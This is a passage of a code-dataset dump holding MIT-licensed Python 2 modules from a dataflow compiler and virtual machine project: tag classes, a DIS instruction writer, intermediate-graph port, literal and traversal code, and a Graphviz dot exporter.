\" + str(self.inst)\n\t\tport = \"port \" + str(self.port)\n\t\tcont = \"cont \" + str(self.cont) \n\t\treturn \"%s | %s | %s \" % (inst, port, cont)\n\n\tdef isStop(self): return False\n\n##\n# External Tag\n#\n# Represents a token with data from the user.\n# Internally, this is just a tag with a predetermined\n# destination.\n##\nclass ExternalTag(Tag):\n\tdef __init__(self, port):\n\t\tsuper(ExternalTag, self).__init__((0,0), port, -1)\n\n##\n# Stop Tag\n#\n# Signals the end of program execution.\n##\nclass StopTag(AbstractTag):\n\tdef __init__(self):\n\t\tsuper(StopTag, self).__init__()\n\t\tself.init = True\n\n\tdef __str__(self): return \"<STOP>\"\n\tdef notify(self): self.init = False\n\tdef isInit(self): return self.init\n\tdef isStop(self): return True\n" }, { "alpha_fraction": 0.6684526205062866, "alphanum_fraction": 0.6736828684806824, "avg_line_length": 24.704917907714844, "blob_id": "18f4411a9903965771bd9fb2f7156c1e426c6d6a", "content_id": "0541444d973de0aa1eb0decb510dd6812db9a04d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7839, "license_type": "no_license", "max_line_length": 79, "num_lines": 305, "path": "/DISc/backEnd/DVM/dis.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dis.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The 
above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \package backEnd.DVM.dis\n# \brief dis writer\n#\n# This module contains an API that allows us to write\n# DIS files. \n##\n\nimport StringIO\n\nDVM_CHUNKS = 2\n\n##\n# This class collects the necessary data\n# to generate a DIS string.\n#\n# Its goal is to facilitate the creation of DIS,\n# by containing the necessary strings while doing necessary\n# bookkeeping such as keys. It also allows us to generate a tidier\n# DIS string by arranging the strings per chunk before printing.\n##\nclass DIS(object):\n\n\t##\n\t# Create a DIS object.\n\t# This automatically calls addPredefined()\n\t#\n\t# \param inputs\n\t#\t\tThe amount of inputs the program will accept.\n\t##\n\tdef __init__(self, inputs):\n\t\tsuper(DIS, self).__init__()\n\n\t\t## Stores the node -> (chunk, inst) mapping\n\t\tself.nodes = {}\n\n\t\t## Stores the strings per chunk\n\t\tself.memory = [[] for i in xrange(0, DVM_CHUNKS)]\n\n\t\t## Contains the current key per chunk\n\t\tself.keys = [0 for i in xrange(0, DVM_CHUNKS)]\n\n\t\t## \n\t\t# Contains the context changes that do not know\n\t\t# their destination sinks yet.\n\t\t##\n\t\tself.callMap = {}\n\n\t\tself.chunks = DVM_CHUNKS\n\t\tself.inputs = inputs\n\t\tself.indent = 0\n\n\t\tself.addPredefined(inputs)\n\n\t## Add the standard statements to DIS.\n\tdef addPredefined(self, inputs):\n\t\tself.addCommentLine(\"Program entry and exit point\", 0)\n\t\tself.addInstruction(0, 'BGN', [inputs])\n\t\tself.addInstruction(0, 'STP', [])\n\t\tself.addNewline(0)\n\n\t## \n\t# Link a node to a key pair.\n\t#\n\t# We store the source and destination keys\n\t# separately for nodes that are converted to multiple\n\t# instructions.\n\t#\n\t# \param node\n\t#\t\tThe node to associate with the keys\n\t# \param toKey\n\t#\t\tThe key if you want to link from a different node\n\t#\t\t__to__ this node, in other words, when this node is the \n\t#\t\tdestination.\n\t# \param fromKey\n\t#\t\tThe key if you want to link __from__ this node,\n\t#\t\tin other words, when this node is the source.\n\t##\n\tdef linkNode(self, node, toKey, fromKey):\n\t\tself.nodes.update({node.key : (fromKey, toKey)})\n\n\t\tif node.key in self.callMap:\n\t\t\tfor idx in self.callMap[node.key]:\n\t\t\t\tself.modifyString(0, idx, \n\t\t\t\t\tlambda str : str % (toKey[0], toKey[1]))\n\t\t\tdel self.callMap[node.key]\n\n\t## Get the from key for a node.\n\tdef getFromKey(self, node):\n\t\treturn self.nodes[node.key][0]\n\n\t## Get the to key for a node.\n\tdef getToKey(self, node):\n\t\treturn self.nodes[node.key][1]\n\n\t## \n\t# Add the index of a string waiting for the address\n\t# of a call to become known.\n\t#\n\t# \param node\n\t#\t\tThe node that is not bound to an address yet.\n\t# \param idx\n\t#\t\tThe idx of the string that needs to be updated\n\t#\t\twhen the node is bound.\n\t##\n\tdef addCallIdx(self, node, idx):\n\t\tif node.key in 
self.callMap:\n\t\t\tself.callMap[node.key].append(idx)\n\t\telse:\n\t\t\tself.callMap.update({node.key : [idx]})\n\n\t##\n\t# Add a string to a chunk.\n\t# This string does not influence keys.\n\t##\n\tdef addString(self, str, chunk):\n\t\tlst = self.memory[chunk]\n\t\tstr = \"%s%s\" % (self.indent * '\\t', str)\n\t\tlst.append(str)\n\n\t##\n\t# Add a string that needs to receive a key\n\t# in the instruction memory.\n\t# \n\t# \\param str\n\t#\t\tA __format string__ that has room for a\n\t#\t\tsingle integer, this means the string should \n\t#\t\tcontain a single %d. This %d will be replaced\n\t#\t\tby the received key.\n\t# \\param chunk\n\t#\t\tThe chunk where we place the string.\n\t#\n\t# \\return\n\t#\t\tA (chunk, key) pair\n\t##\n\tdef addKeyedString(self, str, chunk):\n\t\tkey = self.keys[chunk]\n\t\tself.keys[chunk] += 1\n\t\tstr = str % key\n\n\t\tstr = \"%s%s\" % (self.indent * '\\t', str)\n\t\tself.memory[chunk].append(str)\n\t\treturn (chunk, key)\n\n\t##\n\t# Modify a string in the memory.\n\t# The result of func(str) will be added to the\n\t# instruction memory.\n\t#\n\t# \\param chunk\n\t#\t\tThe chunk where we can find the string.\n\t# \\param idx\n\t#\t\tThe index of the string.\n\t# \\param func\n\t#\t\tThe function to apply on the string.\n\t##\n\tdef modifyString(self, chunk, idx, func):\n\t\tself.memory[chunk][idx] = func(self.memory[chunk][idx])\n\n\t## Return the index of the string that was added last.\n\tdef getIdx(self, chunk):\n\t\treturn len(self.memory[chunk]) - 1\n\t## \n\t# Convenience function to add \n\t# a newline for prettier output.\n\t##\n\tdef addNewline(self, chunk):\n\t\tself.addString('', chunk)\n\n\t## Adds a newline to every chunk\n\tdef addNewlines(self):\n\t\tfor c in xrange(0, self.chunks):\n\t\t\tself.addNewline(c)\n\n\t##\n\t# Convenience function to add a \n\t# comment line for better documented output.\n\t##\n\tdef addCommentLine(self, comment, chunk):\n\t\tself.addString('$ %s' % comment, chunk)\n\n\t## Add a comment to every chunk\n\tdef addCommentLines(self, comment):\n\t\tfor c in xrange(0, self.chunks):\n\t\t\tself.addCommentLine(comment, c)\n\n\t##\n\t# Generate a chunk string.\n\t##\n\tdef createChunk(self, idx):\n\t\treturn \"CHUNK %d\" % idx\n\n\t##\n\t# Add an instruction.\n\t#\n\t# \\param chunk \n\t#\t\tThe chunk this instruction belongs to.\n\t# \\param type\n\t#\t\tThe instruction type (such as OP)\n\t# \\param args\n\t#\t\tThe other arguments, in a list.\n\t#\t\tThese depend on the type of instruction.\n\t#\n\t# \\return\n\t#\tThe (chunk, key) pair of this instruction.\n\t##\n\tdef addInstruction(self, chunk, type, args):\n\t\targStr = \" \".join(map(str, args))\n\t\tins = \"INST %s %s %s\" % (type, '%d', argStr)\n\t\treturn self.addKeyedString(ins, chunk)\n\n\t##\n\t# Add a literal to DIS.\n\t#\n\t# \\param key \n\t# \t\tA (chunk, instruction) key pair.\n\t# \\param port\n\t#\t\tThe port to send the literal to.\n\t# \\param value\n\t#\t\tThe value of the literal.\n\t##\n\tdef addLiteral(self, key, port, value):\n\t\tstr = \"LITR %d %d <= %s\" % (key[1], port, value)\n\t\tself.addString(str, key[0])\n\n\t##\n\t# Add a link to DIS.\n\t#\n\t# Links are not dependent on chunks.\n\t# Currently they are written in the chunk of the\n\t# from instruction.\n\t#\n\t# \\param fromKey \n\t# \t\tThe from (chunk, instruction) key pair.\n\t# \\param fromPort\n\t#\t\tThe port to send from.\t\n\t# \\param toKey \n\t# \t\tThe to (chunk, instruction) key pair.\n\t# \\param toPort\n\t#\t\tThe port to send to.\n\t##\n\tdef addLink(self, 
fromKey, fromPort, toKey, toPort):\n\t\tstr = \"LINK %d %d %d -> %d %d %d\" % (\n\t\t\tfromKey[0], fromKey[1], fromPort,\n\t\t\ttoKey[0], toKey[1], toPort)\n\n\t\tself.addString(str, fromKey[0])\n\n\t## Link every output of start to an instruction.\n\tdef linkStart(self, key):\n\t\tfor i in xrange(0, self.inputs):\n\t\t\tself.addLink((0,0), i, key, i)\n\n\t## Link the output of a node to stop.\n\tdef linkStop(self, key):\n\t\tself.addLink(key, 0, (0,1), 0)\n\n\t##\n\t# Return the DIS string for the current\n\t# contents of the memories.\n\t##\n\tdef generate(self):\n\t\tbuffer = StringIO.StringIO()\n\t\tbuffer.write('$ Generated by DISc \\n\\n')\n\n\t\tfor i in xrange(0, len(self.memory)):\n\t\t\tbuffer.write(self.createChunk(i))\n\t\t\tbuffer.write('\\n')\n\n\t\t\tchunk = self.memory[i]\n\t\t\tfor str in chunk:\n\t\t\t\tbuffer.write(str)\n\t\t\t\tbuffer.write('\\n')\n\n\t\t\tbuffer.write('\\n')\n\n\t\tres = buffer.getvalue()\n\t\tbuffer.close()\n\t\treturn res" }, { "alpha_fraction": 0.7346048951148987, "alphanum_fraction": 0.7389645576477051, "avg_line_length": 30.11864471435547, "blob_id": "a74781f43a73346e8c7ef8f81a363ea6008b1e47", "content_id": "683d87f0654b11c692e485d6a7e83a70f8baa455", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 79, "num_lines": 59, "path": "/DISc/IGR/literal.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# literal.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.literal\n# \\brief Literal definitions\n# \n# IGR Literals\n##\n\n##\n# Literal\n#\n# Literals are values inherent to the program.\n# Examples include constants in arithmetic expressions,\n# function names, strings, ...\n# \n# Every literal has a value and a target, which is an IGR::port::InputPort.\n##\nclass Literal(object):\n\t\n\t##\n\t# Create a new literal.\n\t#\n\t# \\param value\n\t#\t\tThe value of the literal\n\t# \\param destination\n\t#\t\tThe destination of the literal value\n\t##\n\tdef __init__(self, value, destination):\n\t\tsuper(Literal, self).__init__()\n\t\tself.value = value\n\t\tself.destination = destination\n\n\t## See if this is a port (mainly for traversal)\n\tdef isPort(self): return False" }, { "alpha_fraction": 0.7469413876533508, "alphanum_fraction": 0.7495170831680298, "avg_line_length": 30.693878173828125, "blob_id": "ccda0d63ab32fa366c1454cb747074660e66877e", "content_id": "2259852b05e43e647804bf7c04c2737d02904539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3106, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/DISc/IGR/traverse.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# traverse.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.traverse\n# \\brief IGR Traversals\n# \n# This module defines the various functions\n# that allow us to traverse and transform the \n# IGR graph.\n##\n\nimport graph\n\n##\n# Traverse all the nodes in the program.\n# We traverse over a copy so it's safe to modify the IGR\n# structure while traversing over the graph.\n#\n# \\param nodeProc\n#\t\tThe function that is called when we encounter a node.\n#\t\tnode is passed as an argument to this function.\n# \\param subGraphStart\n#\t\tThe function that is called when we enter a new subgraph.\n#\t\tThe subgraph is passed as an argument.\n# \\param subGraphStop\n#\t\tThe function that is called when we exit a subgraph.\n#\t\tThe subgraph is passed as an argument.\n# \\param skipCompound\n#\t\tShould be true is you want to treat compounds as normal nodes.\n#\t\tIf this value is false, the subgraphs of any compound node will\n#\t\tbe traversed.\n# \\param compoundStart\n#\t\tThe function that is called when we start parsing a compound node.\n#\t\tThe node is passed as an argument to this function.\n#\t\tRemember that we have already called nodeProc on this node!\n# \\param comoundEnd\n#\t\tThe function that is called when we exit a compound node.\n#\t\tThe node in question is passed to the function.\n# \\param subGraphs\n#\t\tThe subgraphs to traverse. Parses the entire program by default.\n##\ndef traverse(\n \tnodeProc, \n\tsubGraphStart,\n\tsubGraphStop, \n\tskipCompound,\n\tcompoundStart,\n\tcompoundStop,\n\tsubGraphs = graph.getSubGraphs()\n\t):\n\n\tdef traverseSubGraph(subGraph, nodeProc):\n\t\tsubGraphStart(subGraph)\n\t\tfor node in list(subGraph.nodes):\n\t\t\tnodeProc(node)\n\t\t\tcheckCompound(node)\n\t\tsubGraphStop(subGraph)\n\n\tdef checkCompound(node):\n\t\tif (not skipCompound) and (node.isCompound()):\n\t\t\tcompoundStart(node)\n\t\t\ttraverse(\n\t\t\t\tnodeProc,\n\t\t\t\tsubGraphStart,\n\t\t\t\tsubGraphStop,\n\t\t\t\tskipCompound,\n\t\t\t\tcompoundStart,\n\t\t\t\tcompoundStop,\n\t\t\t\tnode.subGraphs\n\t\t\t\t)\n\t\t\tcompoundStop(node)\n\n\tfor subGraph in list(subGraphs):\n\t\ttraverseSubGraph(subGraph, nodeProc)\n" }, { "alpha_fraction": 0.6888453960418701, "alphanum_fraction": 0.6919205784797668, "avg_line_length": 27.498008728027344, "blob_id": "10625eb607a30d31314bed4d74c5559972c497fc", "content_id": "c5187655b1d65ff7a3f8d943f89b48774b19b279", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7154, "license_type": "no_license", "max_line_length": 83, "num_lines": 251, "path": "/DVM/dot.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dot.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentat ion files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice 
shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package dot\n# \\brief dot generator\n#\n# This module defines a tool that allows us \n# to generate graphs from the instruction memory.\n##\n\nimport StringIO\nimport subprocess\nimport core.memory\nimport core.instruction\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\n# ------- #\n# General #\n# ------- #\n\n## Generate a unique idea for a chunk/key pair.\ndef generateIdentifier(chunk, key):\n\tif chunk >= key: return chunk ** 2 + chunk + key \n\telse: return key ** 2 + chunk\n\n## Generate a unique identifier for an instruction.\ndef generateInstIdentifier(inst):\n\treturn generateIdentifier(inst.key[0], inst.key[1])\n\n## Generate a unique identifier for a chunk, key pair.\ndef generateTupleIdentifier(tup):\n\treturn generateIdentifier(tup[0], tup[1])\n\n# ------------ #\n# Instructions #\n# ------------ #\n\ndef processSink(inst):\n\tshape = \"shape = record\"\n\tlabel = \"|\".join([\"<%d>\" % i for i in xrange(max(inst.destinations.keys()) + 1)])\n\tlabel = \"{Sink: %s|{%s}}\" % (inst.key[1], label)\n\tlabel = 'label = \"%s\"' % label\n\treturn \"%s, %s\" % (shape, label)\n\ndef processOp(inst):\n\tshape = \"shape = Mrecord\"\n\n\tlits = [str(l) if l is not None else \"\" for l in inst.litLst]\n\tinputs = \"|\".join([\"<%d> %s\" % (i, lits[i]) for i in xrange(0, inst.totalInputs)])\n\n\tname = inst.operation.__name__\n\tlabel = 'label = \"{{%s} | %s}\"' % (inputs, name)\n\n\treturn \"%s, %s\" % (shape, label)\n\ndef processConst(inst):\n\treturn \"shape = circle, label = %s\" % inst.value\n\ndef processSplit(inst):\n\treturn 'shape = ellipse, label = \"Split\"'\n\ndef processContChange(inst):\n\treturn 'shape = ellipse, label = \"Send: %s\"' % inst.destSink[1]\n\ndef processContRestore(inst):\n\treturn 'shape = ellipse, style = dashed, label = \"\"'\n\ndef processSwitch(inst):\n\treturn \"shape = diamond, label = Switch\"\n\ndef processStop(inst):\n\treturn \"shape = point\"\n\nattributes = {\n\tcore.instruction.OperationInstruction : processOp,\n\tcore.instruction.Constant : processConst,\n\tcore.instruction.Sink : processSink,\n\tcore.instruction.Split : processSplit,\n\tcore.instruction.ContextChange : processContChange,\n\tcore.instruction.ContextRestore : processContRestore,\n\tcore.instruction.Switch : processSwitch,\n\tcore.instruction.StopInstruction : processStop\n}\n\ndef getAttributes(inst):\n\treturn attributes[type(inst)](inst)\n\t\ndef addInst(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tatt = getAttributes(inst)\n\tbuffer.write(\"%s [%s];\\n\" % (key, att))\n\n# ----- #\n# Links #\n# ----- #\n\ndef destMapLinks(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tfor src in inst.destinations:\n\t\tfor dst in inst.destinations[src]:\n\t\t\tdstKey = generateTupleIdentifier(dst[0])\n\t\t\tdstPrt = dst[1]\n\t\t\tbuffer.write(\"%d : %d -> %d : %d ; \\n\" % (key, src, dstKey, dstPrt))\n\ndef destListLinks(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tfor dst in 
inst.destinations:\n\t\tdstKey = generateTupleIdentifier(dst[0])\n\t\tdstPrt = dst[1]\n\t\tbuffer.write(\"%d -> %d : %d ; \\n\" % (key, dstKey, dstPrt))\n\ndef addContextChangeLinks(buffer, inst):\n\tsrcKey = generateInstIdentifier(inst)\n\tretKey = generateTupleIdentifier(inst.retnSink)\n\tbuffer.write(\"%s -> %s ; \\n\" % (srcKey, retKey))\n\ndef addSplitLinks(buffer, inst):\n\tsrcKey = generateInstIdentifier(inst)\n\tdstKey = generateTupleIdentifier(inst.dest)\n\tbuffer.write(\"%s -> %s [style = dashed]; \\n\" % (srcKey, dstKey))\n\ndef addSwitchLinks(buffer, inst):\n\tfor dst in inst.dstLst:\n\t\tsrcKey = generateInstIdentifier(inst)\n\t\tdstKey = generateTupleIdentifier(dst)\n\t\tbuffer.write(\"%s -> %s [style = dashed]; \\n\" % (srcKey, dstKey))\n\ndef addLinks(buffer, inst):\n\t# Soft links\n\tif isinstance(inst, core.instruction.DestinationMap):\n\t\tdestMapLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.DestinationList):\n\t\tdestListLinks(buffer, inst)\n\n\t# Hard links\n\tif isinstance(inst, core.instruction.ContextChange):\n\t\taddContextChangeLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.Switch):\n\t\taddSwitchLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.Split):\n\t\taddSplitLinks(buffer, inst)\n\n# ----- #\n# Other #\n# ----- #\n\ndef dotHeader(buffer):\n\tbuffer.write(\"digraph IGR {\\n\")\n\ndef dotFooter(buffer):\n\tbuffer.write(\"}\")\n\n# ------------- #\n# Parsing Logic #\n# ------------- #\n\n## Generate a dot string from the instruction memory.\ndef dotString():\n\tbuffer = StringIO.StringIO()\n\n\tdotHeader(buffer)\n\tfor mem in core.memory.memory().memory:\n\t\tfor inst in mem:\n\t\t\taddInst(buffer, inst)\n\t\t\taddLinks(buffer, inst)\n\tdotFooter(buffer)\n\n\tstr = buffer.getvalue()\n\tbuffer.close()\n\treturn str\n\n## Write the dot string to a file.\ndef dotFile(path):\n\tf = open(path, 'w')\n\tf.write(dotString())\n\tf.close()\n\n##\n# Convert the instruction memory to dot,\n# save it and run dot on this file.\n#\n# This function should be called with keyword arguments.\n# The default arguments will cause the following behaviour:\n# \t\t* dot is assumed to be in your PATH.\n#\t\t* the dot file will be saved in dis.dot\n#\t\t* the output will be in png format.\n#\t\t* dot will decide where to store the output.\n#\t\t\tWith the default settings this would be in dis.dot.png\n#\n# \param dotpath\n#\t\tThe path of the dot executable, in case it's not in your PATH\n# \param path\n#\t\tThe location where the dot file will be stored.\n# \param format\n#\t\tThe output format of the graph dot creates from the dot file.\n# \param output\n#\t\tThe location where we store the output of dot.\n#\t\tLeaving this blank will pass the -O option.\n#\t\tThe -O option lets dot choose the path.\n# \param other\n#\t\tAny other options you want to pass to dot.\n#\t\tThese options should be passed as a list of strings.\n##\ndef dot(\n\tdotpath = \"dot\",\n\tpath = \"dis.dot\", \n\tformat = \"png\", \n\toutput = \"\", \n\tother = [], \n\t):\n\n\tdotFile(path)\n\n\tformat = \"-T\" + format\n\n\tif output: output = \"-o\" + output\n\telse: output = \"-O\"\n\n\ttry:\n\t\tsubprocess.check_call([dotpath, format, path, output, '-q'] + other)\n\texcept subprocess.CalledProcessError, e:\n\t\tlog.error(\"Dot returned with exit code %d\", e.returncode)\n\texcept OSError:\n\t\tlog.error(\"Dot executable not found\")\n\n" }, { "alpha_fraction": 0.6901447176933289, "alphanum_fraction": 0.692328691482544, "avg_line_length": 23.756755828857422, 
"blob_id": "f0266c629d97a47351d40276773fe9f0824f22db", "content_id": "cb441ea1327e8784709cf2c2739990b5a9cc67ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3663, "license_type": "no_license", "max_line_length": 91, "num_lines": 148, "path": "/DISc/IGR/port.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# ports.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.port\n# \\brief Port definitions\n#\n# Defines the various port types of IGR\n##\n\n##\n# Abstract Port\n#\n# Defines an abstract port, a port is the entry or exit point to any node.\n# A port is aware of the node that it belongs to, as well as the index it has in this node.\n##\nclass Port(object):\n\n\t##\n\t# Creates a new port for a node and an index\n\t#\n\t# \\param node\n\t#\t\tThe node that this port belongs to\n\t# \\param idx\n\t# \t\tThe index that this node belongs to\n\t##\n\tdef __init__(self, node, idx):\n\t\tsuper(Port, self).__init__()\n\t\tself.node = node\n\t\tself.idx = idx\n\n\t##\n\t# Create a string version of the port.\n\t#\n\t# \\return\n\t#\tA string representing this port.\n\t# \tThis string should not be used to recreate this port.\n\t##\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\tidx = \"'\" + str(self.idx) + \"'\"\n\t\tnode = str(self.node)\n\t\treturn name + \" \" + idx + \" of \" + node\n\n\t##\n\t# See if the port is connected to something.\n\t#\n\t# \\return \n\t# \t\tTrue if this node is connected.\n\t##\n\tdef isConnected(self): pass\n\n\t##\n\t# Returns true if this port accepts a literal.\n\t##\n\tdef acceptsLiteral(self): return False\n\n\t## See if this is a port (mainly for traversal)\n\tdef isPort(self): return True\n\n##\n# Port that accepts input for a node.\n##\nclass InputPort(Port):\n\n\tdef __init__(self, node, idx):\n\t\tsuper(InputPort, self).__init__(node, idx)\n\t\tself.source = None\n\n\t##\n\t# Attach this port to another port or literal\n\t# This is an implicit edge representation.\n\t# \n\t# \\param source\n\t#\t\tThe source of the connection, a port or literal.\n\t##\n\tdef attach(self, source):\n\t\tself.source = source\n\n\tdef isConnected(self):\n\t\treturn self.source is not None\n\n\tdef acceptsLiteral(self): \n\t\treturn self.isConnected() and not self.source.isPort()\n##\n# Exit point of a node.\n#\n# An output port can be 
attached to many input ports of\n# other nodes. Any data sent through the port is delivered\n# to all of these.\n##\nclass OutputPort(Port):\n\n\tdef __init__(self, node, idx):\n\t\tsuper(OutputPort, self).__init__(node, idx)\n\t\tself.targets = []\n\n\t##\n\t# Add a target to this output port,\n\t# has to be an input port.\n\t#\n\t# \\param target\n\t#\t\tThe target to add.\n\t##\n\tdef addTarget(self, target):\n\t\tself.targets.append(target)\n\n\t##\n\t# Add a list of targets to this\n\t# output port.\n\t##\n\tdef addTargets(self, targets):\n\t\tself.targets += targets\n\n\t##\n\t# Remove a target from the port.\n\t#\n\t# \\param target\n\t#\t\tThe target to remove.\n\t##\n\tdef removeTarget(self, target):\n\t\tself.targets.remove(target)\n\n\tdef isConnected(self):\n\t\treturn self.targets != []" }, { "alpha_fraction": 0.6105641722679138, "alphanum_fraction": 0.6135604977607727, "avg_line_length": 18.18062400817871, "blob_id": "e084c19a3216d2b21f4dcaca7cf0313605f615f8", "content_id": "439e9a8b1bf091cd7892b64ce62516f7c18c777f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11681, "license_type": "no_license", "max_line_length": 79, "num_lines": 609, "path": "/DVM/natives.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY 